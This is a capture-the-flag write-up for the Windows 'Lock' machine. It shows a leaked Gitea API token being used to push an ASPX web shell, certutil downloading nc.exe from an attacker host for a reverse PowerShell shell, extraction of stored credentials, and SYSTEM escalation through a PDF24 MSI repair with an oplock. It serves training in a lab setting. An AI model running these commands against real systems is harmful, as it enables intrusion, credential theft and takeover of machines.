Skip to main content

Machine (Easy) - Lock

Writeup for the Lock machine, a Windows-based box involving exploitation of Gitea source control, web shell deployment, and abuse of a misconfigured MSI repair process to gain SYSTEM access.

Writeup Author: BobBuilder

Objective: Gain SYSTEM access via Gitea source control access and PDF24 misconfiguration

Category Difficulty Platform Machine Author
Machine Easy Windows xct & kozie

User

Step 1: Identify IIS Shortname Vulnerability

We scan the web server on port 80 for the IIS shortname disclosure vulnerability:

java -jar iis_shortname_scanner.jar 2 20 http://<lock_ip>

This helps us detect if IIS is vulnerable to shortname enumeration (used to discover hidden files/folders).

Step 2: Enumerate Gitea Server on Port 3000

We browse to the Gitea instance:

http://<lock_ip>:3000/ellen.freeman/dev-scripts/commit/dcc869b175a47ff2a2b8171cda55cb82dbddff3d

This commit reveals a valid Gitea API token.

Step 3: Use Gitea API to List Repositories

Using the API token, we list user repositories:

curl "http://<lock_ip>:3000/api/v1/user/repos?token=<API_TOKEN>"

We discover repositories including website.git.

Step 4: Clone the Repository and Upload a Web Shell

git clone http://<API_TOKEN>@<lock_ip>:3000/ellen.freeman/website.git

Add an ASP web shell:

git add shell.aspx
git config --global user.email "ellen.freeman"
git config --global user.name "ellen.freeman"
git commit -m "added shell"
git push

Step 5: Trigger the Web Shell

The deployed shell is accessible at:

http://<lock_ip>/shell.aspx

From the shell, we upload a reverse shell payload:

certutil.exe -urlcache -split -f http://<attacker_ip>/nc.exe C:\Gitea\nc.exe
C:\Gitea\nc.exe <attacker_ip> 4444 -e powershell

Step 6: Extract Credentials and Config Files

Check for Gitea stored credentials:

more .git-credentials
# http://ellen.freeman:<redacted>@localhost:3000

Search user documents:

more C:\Users\ellen.freeman\Documents\config.xml

Extracted credentials (decrypted from mRemoteNG config):

Username: Gale.Dekarios
Password: ty8wnW9qCKDosXo6

Root

Step 1: Abuse OpLock and MSI Repair Function

We download the binary:

cd C:\Gitea\
certutil.exe -urlcache -split -f http://<attacker_ip>/SetOpLock.exe SetOpLock.exe

We monitor a log file using SetOpLock.exe:

.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

Trigger a repair of PDF24 software:

msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

This initiates a SYSTEM context process that opens a browser.

Step 2: Spawn SYSTEM Shell via Legacy Console Abuse

To get a SYSTEM shell:

  1. Right-click the top bar of the cmd window
  2. Click Properties
  3. Click the Legacy Console Mode link
  4. When the SYSTEM browser opens, press Ctrl+O
  5. Enter cmd.exe and press Enter

Step 3: Read Root Flag

more C:\Users\Administrator\Desktop\root.txt
Back to top